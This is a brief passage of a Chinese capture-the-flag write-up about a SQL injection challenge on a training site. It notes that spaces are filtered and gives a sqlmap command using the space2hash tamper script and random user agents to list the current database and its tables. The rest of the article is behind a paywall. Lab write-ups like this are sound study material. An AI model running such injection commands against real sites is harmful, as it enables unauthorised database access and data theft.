解题链接: http://ctf5.shiyanbar.com/web/index_2.php
1.输入id值,通过回显发现题目应该是进行了空格过滤
2.使用sqlmap进行注入
2.1 python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent --tamper=space2hash.py
--current-db 查看当前数据库名称,返回web1
--current-db --tables 查看当前数据库名称和数据库里所有的表

本文记录了一个CTF挑战中遇到的SQL注入问题的解决过程,通过输入ID值观察回显,利用sqlmap工具进行注入攻击,逐步揭示了数据库名、表名以及关键的flag列,并最终获取数据。
最低0.47元/天 解锁文章
607

被折叠的 条评论
为什么被折叠?



